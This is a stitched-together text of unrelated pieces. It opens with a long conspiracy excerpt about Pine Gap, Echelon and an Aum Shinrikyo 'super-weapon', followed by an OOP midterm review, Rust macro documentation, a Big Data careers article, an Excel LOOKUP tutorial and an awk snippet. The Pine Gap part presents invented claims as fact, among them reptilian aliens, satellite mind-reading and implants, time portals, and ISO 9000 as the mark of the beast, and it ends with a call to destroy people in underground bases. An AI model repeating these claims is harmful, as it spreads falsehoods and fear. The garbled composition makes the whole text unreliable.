He was about to reveal all, but was killed. According to journalist Jack Amano, in David Guyatt's article: "It was Hayakawa who decided to purchase the sheep station [in early April 1993], just days prior to the energy event and subsequent ground tremor." Hayakawa's sojourns to Russia reaped rewards: "Aum's Russian scientists had provided detailed designs and the theoretical grounding to develop a technology more powerful even than the ultimate weapon predicted by Asahara. Not least in the Aum efforts was the acquisition of related US weapons data obtained by hacking into sensitive US databases. Thus, with the aid of Japanese government funding, Russian technological know-how and advanced equipment provided by major Japanese transnational corporations, a terrifyingly powerful super-weapon was being constructed in secret."
Excerpt from the chapter:
PINE GAP: AUSTRALIA'S AREA 51
By Christi Verismo
http://www.angelfire.com/oz/cv/cverismo2e1.html
There are at least ten top-secret American facilities in Australia, with the so-called 'Joint Defense Space Research Facility' at Pine Gap, a multi-billion dollar operation, being the most important. Originally Pine Gap was designed to control and act as a downlink for geosynchronous intelligence-gathering satellites stationed over the Pacific and Asia by the CIA, NSA and NRO. Construction was undertaken solely by American contractors flying in, making it operational by 1970.
Large underground facilities are rumored to extend twelve levels below the base. Long tunnels are laid out in a similar pattern to the spokes of a wheel and extend several miles from the center. A secret nuclear reactor is installed in a deep shielded underground chamber.
Reportedly, extending five miles below the base is a bore hole containing an ultra-low-frequency antenna, which is apparently used for secret experiments supposedly related to Nikola Tesla's resonance theories, as well as low-frequency communications throughout the world. Pine Gap's communication systems are the most sophisticated available, utilizing satellites, microwave, low frequency and their own dedicated cable to the US. They are directly connected to Nurrungar, North West Cape, Geraldton, the Australian Defense Signals Directorate in Melbourne, Canberra, Sydney, all CIA and NSA stations, ASIO, SIS and the Australian Defense Science and Technology Organization, which deals with UFOs and crash retrievals.
Pine Gap has eight white radomes placed near groups of long, low buildings. Miles away a double security fence is patrolled by Americans and Australian police. There is a five-mile no-fly zone. Pine Gap is now being expanded with a second above-ground power station and additional housing for its staff of around 1,200 (as of 1996). The reason: "Asian economic espionage".
A major NSA defector revealed that the US has been carrying out continuous research into electromagnetic propulsion at Pine Gap since 1966, research which was originally started in the US after the war. Security measures have included hypnotic and post-hypnotic keys planted in personnel prior to their acceptance into the project.
A man has claimed his father worked on UFOs at Pine Gap. The father worked for the FAA in 1970, fixing the programming of mainframe computers, and was one of only two or three people in the US who knew whatever program they were installing. During the late 70's he made several trips to Australia. When he came to visit, he had a locked briefcase chained to him, and they were followed everywhere. He said he was working on a flying saucer involved with anti-gravity propulsion, melding the computer elements together for the guidance or stability part of it, underground at Pine Gap.
Pine Gap locals have seen 30 ft wide white disks, with the USAF emblem on them, being unloaded from large US cargo planes at the airports. Many are seen flying at night. Much furniture has been delivered. An enormous amount of food is apparently stocked in warehouses of what could be a multi-leveled underground city. Dr Jean Francois Gille writes that shares put on the market at the same time will cause a world stock market crash. Cash will be worthless, and the risks of a planned global confrontation will be high.
Underground bases will serve as a place of safety for politicians and international financiers. Plastic cards will be necessary, along with the setting up of a world government ensuring 'peace'. Many will be taken to concentration camps. Our new 'Masters' have the support of the aliens they have made alliances with. William Cooper says the CIA Directors and Secretaries of State were all members of the Council on Foreign Relations and also of MJ 12, which includes Kissinger. They rule the US. The secret government kills America's children for the alien projects, according to their agreements with alien nations to rule the world jointly.
They can make US currency worthless at any time and bring everyone under control with their global credit card. In 1996 witnesses saw a triangular craft descend at an area west of Pine Gap, and many UFOs have been seen coming and going regularly from camouflaged entrances at Pine Gap. Scientists work underground there together with various aliens (mostly reptilians claiming to have once originated from earth, with the DNA of a two-legged earth sauroid) that the US govt. has made alliances with. Genetic research in the form of human/alien hybridization and anti-gravity experimentation is done at Pine Gap and other underground US bases.
Stan Deyo also asks if Pine Gap could be a man-made city of multiple levels, used to shelter key US personnel in the event of some disaster. Among some of the major contractors and suppliers for Pine Gap have been Collins Radio, McMahon Construction, LTV (an aerospace company and conglomerate of electronics and aircraft manufacturing subsidiaries) and IBM. Stan says it is rumored that there are super IBM computer systems on a floating platform, 'down the well' underneath the facility.
IBM has mammoth computers which can recognize both voice and visual patterns. Their main memory sizes are said to be in excess of 2,000,000,000 bytes. The first two antennas for controlling and communicating with satellites were constructed in 1966-67. In 1974 unauthorized photos and other information from inside the facility were reported to have been sold to Russia. In 1991 Pine Gap was instrumental in tracking Iraqi SCUD missiles, with satellite imagery tracking the Iraqi troops.
Diane Harrison wrote that there are now about 18 satellite control antennas, making it one of the largest satellite control stations in the world for satellites parked in fixed orbits above the equator. The most recent satellites are 300 feet in diameter. They intercept signals in the VHF, UHF and millimeter-wave frequency bands. Within that frequency range there are four categories of signals. The first category monitors signals transmitted in the course of advanced weapons development, particularly ballistic missiles.
The first satellites were designed for this and monitored Russian missile development programs; the system now monitors other countries as well, though the newer satellites are still aimed primarily at the Soviet Union. This intelligence is shared. The second category monitors signals from large radars, including ones associated with anti-ballistic missile fields, air defense radars and radars on ships. Analysis of this tells a lot about the capabilities of those anti-missile and anti-aircraft systems in the various air defense fields around the globe.
Thirdly, they intercept the communications of other satellite systems, i.e. communications going up from the ground to communication satellites which are also based in fixed orbits; listening satellites are parked close to the communications satellites. Finally, they monitor a wide range of other microwave emissions on the earth's surface, including long-distance phone calls transmitted via terrestrial microwave circuits, enabling them to monitor military, political and government agencies or private individuals.
Diane says that a satellite can be parked over the interior of a country to intercept the microwave emissions coming from it. The satellites are under the control of the CIA, who in turn answer to the NRO (National Reconnaissance Office). There are 8 large radomes that cover the antenna arrays, keeping sand etc. away and concealing the antennas' positions from enemy spy satellites. There is a wide range of communication devices: HF radio, underground cable, Telstra telephone and telex, and 2 satellite communication terminals, to occupy the staff of, on average, 1,200. The staff have to wear color-coded ID to match the color ribbons running along the walls.
The US Military Airlift Command carries thousands of tapes home for further study and sends parts and supplies twice weekly. There are direct links from Pine Gap to the US bases in the Philippines, Guam, Krugersdorp South Africa and the Amundsen-Scott base at the South Pole.
The computer room is one of the biggest in the world, and the operators use headsets to communicate. Within the central operations building at Pine Gap, people keep the satellites and their antennas focused on the signals being intercepted. Other staff then process the enormous volume of intercepted signals, and the signals are analyzed for intelligence data. Up to 1980 Australians were not allowed access to the voice intercepts coming into the signal analysis section, but now they have full access to all areas except the cryptographic room, officially anyway. Univac computers encrypt transmissions, including voices, and these go to Redondo Beach in California.
About 25 to 30 messages are sent from Pine Gap to the US each day, and about half go to the CIA headquarters in Langley, Virginia, though occasionally data is sent directly to the NRO headquarters in the Pentagon, or to the NSA headquarters at Fort Meade, Maryland. Diane writes that there is a group called the Joint Reconnaissance Schedule committee, who meet each morning to decide who is going to be listened to for the next 24 hours and to focus the antennas on the satellites accordingly, e.g. if someone is doing a missile test, or if a political crisis occurs somewhere. A station similar to Pine Gap is located in South Africa with 1,200 staff, and it is also linked to another VLF station at the South Pole.
Dr Gille writes that Pine Gap has enormous computers connected to their counterparts in the US, Krugersdorp South Africa, Guam, Canberra and the Antarctica US base, which collect information from these countries about finance, technology, and everything about people. The Amundsen-Scott base at the South Pole is located on a sensitive magnetic spot of our planet, holds exactly the same assets as Pine Gap, and all the information about most of the average citizens of Western Europe is stored there in memory banks tens of meters under the icepack.
The Canberra computers were connected to all banks, every post office, all telephones, all police stations and customs houses, every arrival and departure desk for air or sea travelers, and to the other data centers collecting data on private citizens in America and Europe. All financial, economic, political and military information about every citizen of the Western World is being stored. The president of the Rockefeller Foundation arranged the construction of 20 luxury residences in Canberra to accommodate the world government-to-be.
In Silent Partners: The UKUSA Agreement (www.nexusmagazine.com), Susan Bryce says there are about 48 years of SIGINT (satellite signal intelligence) shared by the UKUSA partners: US, Canada, UK, Australia, New Zealand, Japan, South Korea and the NATO nations. (Possibly Germany, Norway, Turkey and China are in too.) As well as communications interception and satellite spying, there is an interest in undersea activities. (There are said to be over 1,400 alien bases on this planet, including undersea.)
The UKUSA pact has been gathering intelligence on the former Soviet empire for 40 years. Pine Gap, Nurrungar and Menwith Hill operate under this pact. Menwith Hill, in the UK, covers communications and phone calls between the USA and Europe. The NSA, which runs this, controls over 2,000 electronic intercept stations, with 130,000 personnel around the world. The primary purpose for which the NSA was started was to decipher alien communications and language and to establish dialogue. In 1983 the NSA established a worldwide computer network linking 52 separate government computer systems used throughout the world. All the information ends up at the NSA's headquarters in Maryland. So it can plug into each phone call and message in the USA, UK and Australia using the US base Pine Gap and the new installation at Geraldton in Western Australia.
Patrick Poole wrote a very complete analysis, and here is a summary: Echelon, based at Pine Gap, is the technological spy system intercepting all phone calls, faxes, emails and telexes in the world, mainly by satellite, plus other satellites, microwave signals, cellular and fibre-optic cable communications traffic. Real-time phone calls in the USA could be listened to at an outpost of Echelon at Menwith Hill in the UK. Commercial espionage can be beneficial to the companies that helped the NSA develop the systems that power the Echelon network.
This can also be used to push American manufacturers out of deals in favor of US defense and intelligence contractors, who frequently finance both political parties. The European Parliament is asking if this violates the sovereignty and privacy of citizens in other countries. Though the UK does allow surveillance on its own citizens, Menwith Hill and Pine Gap cover US citizens. Echelon stations are all over the globe: from Geraldton W. Australia, Waihopai New Zealand, Ascension Island in the Atlantic, the Indian Ocean atoll of Diego Garcia, Guam and the Philippines in the Pacific, to South Africa, Misawa Japan and Leitrim Canada.
Pine Gap, Menwith Hill, Bad Aibling Germany, Colorado USA and Antarctica are the main centers. No communications signal escapes the electronic net. The two primary downlink facilities for the over 25 satellites acting as giant scoops, picking up info from all electronic communications, are at Menwith Hill on the North York Moors in the UK and at Pine Gap. Menwith Hill has 1,400 American NSA personnel and 350 UK Ministry of Defense staff on site.
Menwith Hill goes back to 1951 and received one of the first sophisticated IBM computers in the early 1960's. The NSA took it over in 1966. British Telecom wires fibre-optic telephone trunklines, capable of carrying 100,000 calls simultaneously, through Menwith Hill. It has become a target for peace activists. Echelon decrypts, filters, examines and codifies messages into selective categories for further analysis by intelligence staff from the various UKUSA agencies.
Menwith Hill's SILKWORTH super-computer operates voice recognition and optical character recognition and feeds the results into data recognition engines. Voice recognition programs convert talk into text messages for further analysis, and even individual voices can be targeted, so that every call they make is transcribed. Each message is given a 4-digit code as to its source, e.g. 5535 for Japanese diplomatic traffic. Keywords are kept up to date by Dictionary Managers. Messages are transmitted to each agency's headquarters via a global computer system that acts as the nervous system.
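The pipeline described above amounts to: transcribe an intercept, tag it with a source code, and match it against a keyword dictionary. A minimal illustrative sketch of that kind of keyword categorization is below; all names, codes and keywords here are hypothetical placeholders, not taken from any real system.

```python
# Toy sketch of a keyword-dictionary filter of the kind described above.
# All source codes and keywords are invented for illustration only.
from dataclasses import dataclass

# Hypothetical 4-digit source codes, in the style of the claim above.
SOURCE_CODES = {"jp-diplomatic": "5535", "test-traffic": "9999"}

# A "Dictionary Manager" would keep this watch-list current.
KEYWORDS = {"missile", "launch", "warhead"}

@dataclass
class Intercept:
    source: str  # traffic category, e.g. "jp-diplomatic"
    text: str    # transcript produced upstream by voice recognition

def categorize(msg: Intercept) -> dict:
    """Tag a message with its source code and any matched keywords."""
    hits = sorted(w for w in KEYWORDS if w in msg.text.lower())
    return {
        "code": SOURCE_CODES.get(msg.source, "0000"),
        "keywords": hits,
        "flagged": bool(hits),
    }

if __name__ == "__main__":
    m = Intercept("jp-diplomatic", "Routine note: no missile test planned.")
    print(categorize(m))  # {'code': '5535', 'keywords': ['missile'], 'flagged': True}
```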
Excerpt from the chapter:
PINE GAP: AUSTRALIA'S AREA 51
By Christi Verismo. Part 2
Echelon II: Patrick further exposes the information-tracking outcome of Echelon's spying on enemies, allies and private citizens. Daily, analysts review the previous day's translations, and these are further categorized into gists, summaries and reports. These are given classifications: Secret, More Secret, Top Secret, Russian Intercepts, and intelligence forwarded to non-UKUSA parties. Even secret submarines are able to tap into undersea communications cables. Though 30 other nations across the world also have eavesdropping networks, none compares to Echelon.
A Ph.D. physicist called "V" wrote that the second generation of Echelon, called Echelon II, is not a US govt.-funded project. It has a series of communications bases near the equator. Its leaders are a cabal from China, several individuals from Europe and a group in the US. It is a highway for all e-business and will be used in conjunction with smart cards for one currency. It will have a database designed for the DRAM semiconductor chips mass-produced down to 0.1 microns. It has a real-time transportation system and logistic tracking system, plus a monitoring system for ICBMs, aircraft and submarines, and a control system for joining all financial institutions together. INSLAW developed the key software package for tracking and monitoring; IBM the computers and chip manufacturing; Loral and GM H the satellites; ATT the long lines and fibre optics; LMT is the major contractor for military information systems; LEH (Lehman Brothers) will be their banker and financial controller; and GM the major civilian transporter.
These six companies will be worth 4 trillion dollars, and the Boards of Directors and the CEOs/Chairmen have been careful not to break any laws to achieve this, including when setting up plants in China - Dr Armstrong, involved with this, said to the Senate Judiciary committee, "we work in the gray area". Many deaths have occurred among people investigating the INSLAW monitoring technology, which uses a backdoor in computer software programs to feed information back to an intelligence agency. Research for the Star Wars satellite project, now operative at Pine Gap, has been conducted under UKUSA. This comprises a global network of satellites which contain powerful lasers and beam machines. Between 1982 and 1988, 22 British defense scientists linked to UKUSA projects died in mysterious circumstances. Some have said they were involved in the mark-of-the-beast microchip implant work.
Beast Computer Centers have several dozen people to run them. Even in the 1970's, an operator could speak into the computer and it would answer. If asked about anyone on the planet, it could usually pull up all kinds of information, e.g. how could you get that person to kill someone, or how can I isolate this person? All the people around that subject who could be manipulated would be revealed, and a plan given. The controllers can actually control the world from a computer.
They store vast amounts of information about people's thought processes and thinking, and it's possible that electronic surveillance is being done to read the thoughts of people, with computers storing this information in some usable fashion. People who invent and work at state-of-the-art technology say this is old technology. Large neural computers that have artificial intelligence, using neural processing like the human brain, are being used. A war could be created between any two nations by asking about a country and then how to start one. There is a network of Cray-type computers, perhaps similar to the EMASS system of Cray computers that E-Systems developed. Such a system can store 5 trillion pages of text and work with that database with lightning speed. The engineer operator of the Beast Computer said that this system was obsolete in 1973.
Al Bielek also said that the aliens working with the US military gave the info to build Cray computers at the CIA underground base at Montauk, NY, and they were used to create time portals. It was a computer manufacturing time portals that sent Edward and Duncan Cameron back to 1943 to destroy the ship Eldridge, which was trapped in hyperspace during the Philadelphia Experiment. The frequency 435 MHz was used to create time/space tunnels when Al Bielek and Duncan Cameron went physically through to Mars from Montauk. Today's 9 Beast computers are much better at speech than the 3 Beast computers of 1973.
They can hear human voices, determine what language is being spoken, and answer in it. These computers link directly to thousands of mind-controlled slaves and, via various methods, can almost instantly control their behavior. Anchorage has an NSA listening post near the HAARP project, whose signals travel on a field line to Pine Gap. The Beast Computer is also linked there, as well as to satellite systems. HAARP uses 3 powerful transmitter sites in Alaska. An anonymous former US govt. source says the human brain, if it has a memex brain implant they control, can interface with the Beast computer, which acts as a vast repository of human knowledge and answers essentially all previously answered questions instantaneously.
If the human brain has some type of virtual-reality holodeck attachment, the computer can even walk the slave through a realistic setting indistinguishable from the real world. One victim had ELF and VLF waves of 435 and 1080 MHz signals targeted on her. (435 is in the 400-450 MHz band, which is the window to human consciousness. 435 MHz is converted to 1080 by interaction with the high-atmosphere HAARP project. HAARP can create time portals and time rifts also.)
Paul Baird wrote that every single phone call, fax, email, telex and computer data message can be intercepted and analyzed by Echelon worldwide. The Echelon computers can scan ALL satellite, microwave, cellular and fibre-optic contacts for keywords and phrases. He said that the CIA use it to protect their own drug-running operations and spy on their opponents, together with their Mafia partners. Paul writes that the head of NATO's non-lethal weapons initiative wants all humans implanted at birth.
Baird writes that govt. agencies can use infrasound laser weapons coming from remote satellites to cause illness and pain to targeted individuals. Visual holograms and blurred vision can be effected by satellite lasers aimed at tracked individuals. They can also use neurophones, a device to convert sound to electrical impulses. A directional satellite laser or microwave targets an individual's nervous system, and it enters the brain as voice threats or noise. These can come from any direction and can be perceived as ghosts, God's voice, aliens, Satan or laughing. Silent subliminal words can target people too, to make them think the thoughts are their own.
Brain wave scanners can mind read by training a satellite onto someone's head and scanning its magnetic field. Patterns which show particular emotions can be read, and more can be sent back to change the emotional/psychological state. EEG results of computerized brainwave scanning can be relayed to US govt. facilities, and the thoughts can be interpreted instantaneously with a brain wave vocabulary developed from the CIA's LSD experiments. Remote torture or interrogation can be carried out by staff at computers thousands of miles away.
Baird writes that psychic phenomena and "coincidences" can be arranged using brain-scanning technologies. Could every citizen be brainwave scanned by Echelon at Pine Gap and thoughts suppressed? Only those "in" with them would profit, and only those who questioned nothing would escape scrutiny. No military or federal law enforcement would be necessary. More from Paul Baird here: www.greenpages.com.au/baird.
An Australian newspaper wrote in 1974 that the US has been carrying out research into electromagnetic propulsion (EMP) at Pine Gap since 1966 and that security about this project has resulted in hypnotic and post-hypnotic keys being implanted in personnel prior to their acceptance into this project.
Dr Gille writes that the Pine Gap employees working on the base, and especially those earmarked for duty on electromagnetic propulsion projects, have undergone brainwashing and even implantation of intracranial devices. The most powerful mind-control is still trauma-based built on a foundation of multiple personalities which are dissociated personalities and parts of the mind. It appears that electronic mind-control is being overlaid on top of this. The victim’s consciousness is not able to think past the electronic mind-control which catches their undivided attention, being too distracted to deal with the deeper issues of trauma-based mind-control. Instructions can enter someone’s mind through their implant. At the NWO’s major massive beast computer center in Alaska in the 1970’s, an engineer who was in charge of building and getting the center operational, revealed the site’s capabilities. They also had one in South Africa and one in Pine Gap. These three sites formed a triangle on the globe, and couldn’t be located anywhere else, due to the naturally occurring lines of force of the planet.
Project L.U.C.I.D. Beast 666 Universal Human Control System: Texe Marrs in his book Project L.U.C.I.D. writes that every person on the planet will be issued a 'Smart' ID card to be monitored 24 hours a day, 7 days a week by a Central Gestapo consisting of agencies made up of the FBI, KGB, CIA, DEA, DIA, NSA, IRS, EPA, OSHA, NCIC, USDA, FDA, NRO, BATF, FINCEN, INS, DOJ, WTO, Europol, Interpol, Mossad and the MAB. He says resistors will have a microchip surgically implanted in their brains. All manufactured goods will be marked with the number of the beast, 666.
This, he claims, is the ISO 9000 certification system. The Bilderbergers made the command decision for ISO 9000. 100 countries have adopted it, and it is fast becoming the sole requirement for conducting commerce in all nations of the world. The NSA, which controls the L.U.C.I.D. giant computer network, correlates, deciphers and analyses data and reports from international banks, the 32 directorates of the UN, the core of the Secret Societies, the Vatican and various agencies of 170 nations.
Alice Bailey's Lucis Trust is closely affiliated with UN leadership, and its membership includes Robert McNamara, former Secretary of Defense and former head of the World Bank. The primary goal of the Lucis Trust is a New World Order/One World Government presided over by a world teacher, probably the ET entity Maitreya. The UN world army will have total military control and enforcement power for the whole planet.
All computers on earth, the entire information highway, will be networked into L.U.C.I.D. It will be the planet's primary core, linking all networks and data systems. Those authorized will have access to instantaneous data on individuals to track and control every move with the chip in the cards, or embedded in the body. These cards are reprogrammable at hundreds of thousands of scanner centers and hold more than five gigabytes of updated data per individual.
Texe writes that scanners will identify you by the shape of your hand, foot, face or head, fingerprints, blood type, human leukocyte antigen, DNA, iris scan and voice. Satellite cameras, which can take recognizable 35mm-type images of golf balls below, will be able to locate you from the chip in the card, nobody being able to buy and sell without it. DNA databanks have had samples of blood from newborn babies since the 1960s as mandatory state screening, plus the military and criminals have been databased. John St. Clair Akwei writes in Texe's book that the Signals Intelligence mission of the NSA has evolved into a program of decoding EMF waves in the environment, for wirelessly tapping into computers and tracking persons with the electrical currents in their bodies. Everything in the environment with an electrical current in it has a magnetic flux around it which gives off EMF waves. The NSA/DOD has developed advanced digital equipment which can remotely analyze all objects, whether manmade or organic, that have electrical activity.
A target's bioelectric field can be remotely detected and monitored 24 hrs a day. With special EMF equipment NSA cryptologists can remotely read evoked potentials (from EEGs), which can be decoded into a person's brain states and thoughts. The NSA records and decodes individual brain maps of hundreds of thousands of people. The speech centers of the brain can be translated into the person's verbal thoughts, and these can be manipulated so that simulated auditory hallucinations can be induced. Visual memory can also be seen as images from a person's brain on a video monitor.
NSA operatives can put images into someone's brain while they are in REM sleep for brain-programming purposes. So the current thoughts, images and sounds of anyone can be decoded, read and changed by the NSA's most powerful computers in the world. Much power has been taken away from the human race now due to global treaties taking away sovereignty. This started originally with aliens with whom world governments have made pacts, dictating to the UN top brass which laws to make. More laws in the world are tightening their grip and taking away freedom in a knowing manner, while aliens and the US military at underground bases carry on their covert activities of mind control through technology and abduction of people from their beds during the night via UFOs, to implant and make clones and hybrids from victims. It's time people started to look at and destroy the evil goings-on of those beneath us in these underground bases and bring them to justice.
Fall2004 Midterm Review: Definitions
1. Inheritance: The idea that a class can contain methods and variables that are not specifically defined in its blueprint but defined in the blueprint of its parent class. Ex: The class "Teacher" might not have the variable "name" but since its parent class is "Person," it inherits the name variable.
2. Delegation: The action of one object asking another to perform a "service" for it. Ex: when Joe the Box uses the Pen class to draw itself instead of having its own draw method defined.
3. Polymorphism: the ability to redefine a method to perform similarly for different classes that are derived from a base class. Ex: triangle and square are both subclasses of the shape class, but both contain a draw method that is defined differently yet provides the same functionality.
4. Encapsulation: the idea that objects cannot mess with the data of other objects unless given permission to. In Java this is the idea of having all private variables in a class that can only be changed using modifier (setter) methods.
1) Inheritance - structure and behavior of objects are passed from one object to another.
3) Polymorphism - when the same message performs the (relatively) same functions on different data. This is enabled through late-binding.
4) Encapsulation - the concept that objects have their own data and behaviors and that no other object can access the data without being given that object's permission.
It is important to note that polymorphism is more than just inheritance and the way that the most specific method in the child class will be used. See this page for a good explanation: http://whatis.techtarget.com/definition/0,,sid9_gci212803,00.html
Because Squeak is typeless, we have more flexibility with variables. For example, we might define a variable that we give a value of a number or a string, and both Integers and Strings understand '+': e.g. 6+7=13, '6'+'7'='13'. -ellie
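To tie the four definitions together, here is a minimal sketch in Java (which the encapsulation definition above already references); the class and method names are invented for illustration:

// Encapsulation: Shape's state is private and reachable only through its methods.
class Shape {
    private String name;

    Shape(String name) { this.name = name; }

    public String getName() { return name; }

    // Subclasses override this; callers just send the same "message".
    public double area() { return 0.0; }
}

// Inheritance: Square gets getName() from Shape without redefining it.
class Square extends Shape {
    private double side;

    Square(double side) {
        super("square");
        this.side = side;
    }

    // Polymorphism: same method name, behavior specific to Square.
    @Override
    public double area() { return side * side; }
}

class Demo {
    public static void main(String[] args) {
        Shape s = new Square(2.0);          // static type Shape, dynamic type Square
        System.out.println(s.getName());    // "square" (inherited accessor)
        System.out.println(s.area());       // 4.0 (late-bound override)
    }
}

Delegation would look like Square handing the actual drawing off to a separate Pen object instead of drawing itself, as in the Joe the Box example above.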
Macro matches::matches
macro_rules! matches {
($expression:expr, $($pattern:tt)+) => { ... };
}
Check if an expression matches a refutable pattern.
Syntax: matches!( expression , pattern )
Returns a boolean: true if the expression matches the pattern, false otherwise.
Examples
#[macro_use]
extern crate matches;
pub enum Foo<T> {
A,
B(T),
}
impl<T> Foo<T> {
pub fn is_a(&self) -> bool {
matches!(*self, Foo::A)
}
pub fn is_b(&self) -> bool {
matches!(*self, Foo::B(_))
}
}
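A short usage sketch for the types above (the assertions are illustrative and assume the macro is in scope as in the example):

fn main() {
    let a: Foo<i32> = Foo::A;
    let b = Foo::B(42);
    assert!(a.is_a());
    assert!(b.is_b());
    assert!(!b.is_a());

    // The pattern position also accepts alternations and guards:
    let n = 3;
    assert!(matches!(n, 1 | 2 | 3));
    assert!(matches!(Some(n), Some(x) if x > 2));
}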
Emerging Opportunities In Big Data Careers
The IT infrastructure is ever-changing. In the past few years, we have witnessed a significant breakthrough in the management techniques of businesses and firms around the world. Data accumulation and data analytics are entirely transforming industries today. Companies are now showing a keen interest in leveraging the power of Big Data to gain a competitive advantage in the market and expand their reach. As a result, what we now have is a global economy that is information-based to the core.
Giants of the IT world and business sector are continually engaged in gathering a massive amount of real-time data from their customer base and analyzing it to promote better decision making and boost profitability. According to IBM, businesses across the globe generate as much as 2.5 quintillion bytes of data every day! When such a vast figure of data is combined with the power of IoT, e-commerce, and financial and consultancy services, career opportunities around Big Data are bound to increase. And that is precisely what's happening at present. Today, there is an increasing demand for jobs that no one had even heard of a year ago. PricewaterhouseCoopers (PwC), a professional services firm, maintains that there are 2.3 million job openings solely demanding professionals with analytical skills!
In almost all industries – from education to governance to healthcare – the demand for data analytics professionals is very high. As more companies are joining the bandwagon of data analytics, it has given rise to new and emerging job opportunities in Big Data. This, as a result, has increased the number of people interested in the field of data analytics. So, if you’re aiming for one of the roles we’re going to discuss, we recommend you get equipped with data science certifications. That way, you’ll have a definite edge over your peers.
Now, without further ado, let's check out the major opportunities in and around Big Data.
1. Data Scientist
A data scientist is someone who creates or designs models "that use advanced diagnostic analytics or predictive and prescriptive capabilities, but whose primary job function is outside the field of statistics and analytics." However, while the strongest skill of a data scientist is analytics, he/she should be able to combine this skill with advanced statistical and machine learning tools to fully harness the potential of Big Data. Data scientists excel in deconstructing both structured and unstructured data and analyzing it by utilizing predictive and prescriptive analytics. With the insights thus gained, these data specialists then break down the opportunities and potential of the data for companies and firms, explaining to them how they can leverage the data to add value to their businesses.
IBM maintains that the job of a data scientist is the fastest growing career in data analytics and predicts that it will scale up to 61,799 by 2020.
2. Big Data Engineer
A data engineer’s primary job is to transform huge amounts of data into ‘understandable’ insights that can benefit a firm’s decision-making process as well its overall business strategy. To be precise, data engineers design and manage the entire infrastructure of Big Data. First, they gather the data, and then they construct the basic architecture that’s required to drive the analysis and processing of data. Once the data is processed, data engineers integrate it within the production and management infrastructure to facilitate innovative solutions and better business decisions.
Since data engineers work in close collaboration with data scientists, there has been a significant increase in this job position as well.
3. Data Visualization Analyst
Data analysts are essentially those people who help companies and firms understand the potential of Big Data. They translate the data into scalable information that can be put to good use. Utilizing visual analytics tools such as Tableau, QlikView, etc., and relying on BI, data analysts present data into visual formats like infographics, charts, and dashboards, for the ease of understanding.
The job of a data analyst is mainly Descriptive Analytics oriented as they need to explore the possibilities of Big Data and present it to firms in layman’s terms.
4. Machine Learning Specialist
Machine Learning is a branch of computer science that exclusively deals with creating such algorithms as can ‘learn’ from the data patterns and predict the possible outcomes. Although the job of a machine learning specialist is quite similar to that of a data analyst, they differ in one aspect – while a data analyst analyzes the data and presents it in simplified terms, a machine learning specialist designs software that can run autonomously by utilizing the power of algorithms.
The demand for machine learning specialists is on the rise as these individuals possess high expertise regarding system design, data structures, and computer architecture. According to LinkedIn, today the number of machine learning specialists is 9.8 times more than what it was five years ago, with over 1,829 job listings on the site!
5. E-Discovery Investigators
The position of E-discovery investigators is becoming increasingly important for large companies and organizations. E-discovery or electronic discovery entails the identification, collection, and generation of ESI (electronically stored information) against a lawsuit or for investigation purposes. This process is highly complicated and hence, the rising need for specialists in this field. E-discovery investigators excel in unraveling and gathering data from connected devices or portals and analyzing this data to check for any possible digital footprints left behind by a hacker or a criminal.
Although these job titles are demarcated and differentiated, at the core of each of them is one basic skill – that of channelizing vast chunks of information and help make sense of this information to solve analytical problems of a business or an organization. So, often the skills demanded by these specific job roles overlap and have to be used interchangeably. As more companies and firms invest in Big Data in the future, there will arise many more such challenging job roles which are unheard of now.
LOOKUP Function in Excel
December 17, 2021
WPS Spreadsheet could be an alternative to Microsoft Office Excel. It includes 100's of built-in formulas, pivot tables, and more.
· Description:
The LOOKUP function can search for a value in a column or row and return a particular value from the same position in another column or row. It has two syntax forms.
· Syntax1 :
LOOKUP(value, array)
· Arguments:
Value: The value to search for in an array, which must be in ascending order.
Array: An array of values (contains both the values to search for and return).
· Example:
Suppose we want to find out the scores of students ranked 1, 3, 5, and 7.
1. Open your table in WPS Spreadsheets, click cell H5.
2. In this case, we need to enter the LOOKUP Function.
1) Value is the value to search for in an array. Cell G5 is the value that represents the first-ranking student we want to search for, so let's enter G5 at Value.
2) Array: An array of values (contains both the values to search for and return). The area A3:C12 contains the value of G5 as well as the data we want to return, so let's enter A3:C12 at Array. Also, we need to press F4 to make it an absolute cell reference so that it won't change when the formula is copied to H6:H8.
Thus, we input =LOOKUP(G5,$A$3:$C$12), then press Enter.
The result is 75, which tells us the physics score of the first-ranking student is 75.
3. Drag the fill handle of cell H5 down to complete the process.
· Syntax2 :
LOOKUP( value, lookup_vector, [result_vector] )
· Arguments:
Value: The value to search for.
Lookup_vector: A range that contains only one row or one column of text, numbers, or logical values, placed in ascending order.
Result_vector: [Optional]. A range that contains only one row or column, the same size as Lookup_vector.
· Example:
Still, suppose we want to find out the scores of students ranked 1, 3, 5, and 7. This time we want to use another method to achieve the same end.
1. Open your table in WPS Spreadsheets, click cell H5.
2. We need to insert a LOOKUP function:
1) Value is the value to search for in an array. Cell G5 is the value that represents the first-ranking student we want to search for, so let's enter G5 at Value.
2) Lookup_vector is the range that contains only one row or one column of values. Column A3:A12 is the lookup area that contains the value of G5, so let's put A3:A12 here. Also, we need to press F4 to make it an absolute cell reference so that it won't change when the formula is copied to H6:H8.
3) Result_vector is the range that contains only one row or column, the same size as Lookup_vector. In this case, column C3:C12 is the area that holds the physics scores we want to return, so let's put C3:C12 here. Similarly, we need to press F4 to make it an absolute cell reference so that it won't change when the formula is copied to H6:H8.
Thus, we input: =LOOKUP(G5,$A$3:$A$12,$C$3:$C$12), then press Enter.
Again, the result is 75, which tells us the physics score of the first-ranking student is 75 and further verifies that our answer is correct.
3. To complete this table and fill the remaining cells in this column, drag the fill handle of cell H5 down.
Perform Statistical Operations on Columns in CSV Files
07 Mar 2007
This is a simple but powerful way to process files in Unix, using the humble program awk.
To calculate sum or average of a numerical column of a comma separated file, create a text file like so:
BEGIN { FS = "," }
{ s += $3 }
END { printf "sum = %.2f, avg = %.2f, hits = %d\n", s, s/NR, NR }
Use your creative juices to save it with a meaningful name, say, test.awk.
Call awk with this file, like so:
awk -f test.awk mycsvfile.csv
You should see the sum, average and number of lines processed. In this example, it is assumed that the values in each line are separated by commas, and the numerical column is the third one.
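If you also want the minimum and maximum of the column, a hypothetical extension of the same script (still assuming the third comma-separated column) could look like this:

BEGIN { FS = "," }
NR == 1 { min = $3; max = $3 }    # seed min/max with the first line
{
    s += $3
    if ($3 < min) min = $3
    if ($3 > max) max = $3
}
END { printf "sum = %.2f, avg = %.2f, min = %.2f, max = %.2f, hits = %d\n", s, s/NR, min, max, NR }

Run it the same way: awk -f test.awk mycsvfile.csv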
For more information on awk, RTFM or Google it.
Delayed React
